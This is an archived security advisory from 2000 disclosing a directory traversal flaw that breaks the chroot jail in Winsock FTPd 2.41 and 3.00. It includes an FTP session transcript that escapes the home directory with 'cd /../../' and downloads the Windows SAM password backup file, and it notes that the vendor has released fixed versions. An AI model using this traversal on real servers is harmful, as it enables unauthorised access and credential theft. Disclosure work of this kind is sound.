OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Vulnerability in Winsock FTPD 2.41/3.00 (Pro)
From: Interstellar Overdrive (interdriveHOME.COM)
Date: Mon Nov 27 2000 - 09:21:15 CST


[ Overdrive Advisory # 1 ]

---------------------------[ Synopsis ]

 Subject : Vulnerability in Winsock ftpd
 Application : Winsock FTPd v2.41 RC14, Winsock FTPd v2.41 Pro,
Winsock FTPd v3.00 Pro
 Platform : Win32
 Description : a local user can break the chroot jail
 Date : 11/28/2000
 Author : Interstellar Overdrive
 E-Mail : overdriveworkspot.net
 WWW : http://www.workspot.net/~overdrive/

--------------------------[ Application Info ]

 Winsock FTPd is common popular ftp server for windows95/98/3.11/NT/2K,
by
Texas Imperial Software it is simple, inexpensive, and easy to set ftp
server for
windows machines, current release is v3.0.
 Homepage : http://www.wftpd.com
 Author : Alun Jones <aluntexis.com>

-------------------------[ Overview ]

 In Winsock ftpd, there is an option called "Restrict to home directory
and below"
where the server makes a chroot jail for the user. lets take an example
:

-----snip------
c:>ftp target.com
Connected to target.com
User (target.com:(none)): io
331 Give me your password, please
Password: XXXXXX
230 Logged in successfully
ftp>pwd
257 "/" is current directory #io's directory here c:\wftpd\io
       #and it is chroot'ed
ftp>ls
200 PORT command okay
150 File Listing Follows in ASCII mode.
my_file.txt
my_code.c
226 Transfer finished successfully.
11 Bytes received in 0.01 seconds (1.10 Kbytes/sec)
ftp>cd ../../
501 User is not allowed to change to ../../ - returning to /.
ftp>
#until now chroot jail working fine...

#hmmm, lets try doing 'cd /../../'
ftp>cd /../../
250 "/../.." is current directory
ftp>ls
200 PORT command okay
150 File Listing Follows in ASCII mode.
wftpd
inetpub
DOS
WINA20.386
CONFIG.DOS
CONFIG.SYS
WINNT
AUTOEXEC.BAT
Program Files
TEMP
COMMAND.COM
.....etc # cool !
#even more fun
ftp>cd /../../WINNT/repair/
250 "/../../WINNT/repair/" is current directory
ftp>get /../../WINNT/repair/sam._
200 PORT command okay.......etc we got the file...
---------snap-------

The problem is that the chroot jail only works if the user tried
../../../ not /../../../,
by simply adding a "/" before ../../(which is a common known bug in
win32 applications)
any local user or even anonymous user can change his working directory
to any directory on
the server, having the ability to download any file from the server(as
you saw above).
In other words, the chroot jail is broken.

Vulnerable Winsock FTPd Applications Found :

 Winsock FTPd v2.41 RC14
 Winsock FTPd v2.41 RC14 Pro
 Winsock FTPd v3.00 Pro

-----------------------------[ FIX ]

 Vendor contacted, A new release of Wftpd is out
 which fixes the problem.

 - Wftpd v2.41 RC15
  - Wftpd v3.00 R2
 <http://www.wftpd.com>

-----------------------------[ Credits ]

 Interstellar Overdrive (interdrivehome.com - overdriveworkspot.net)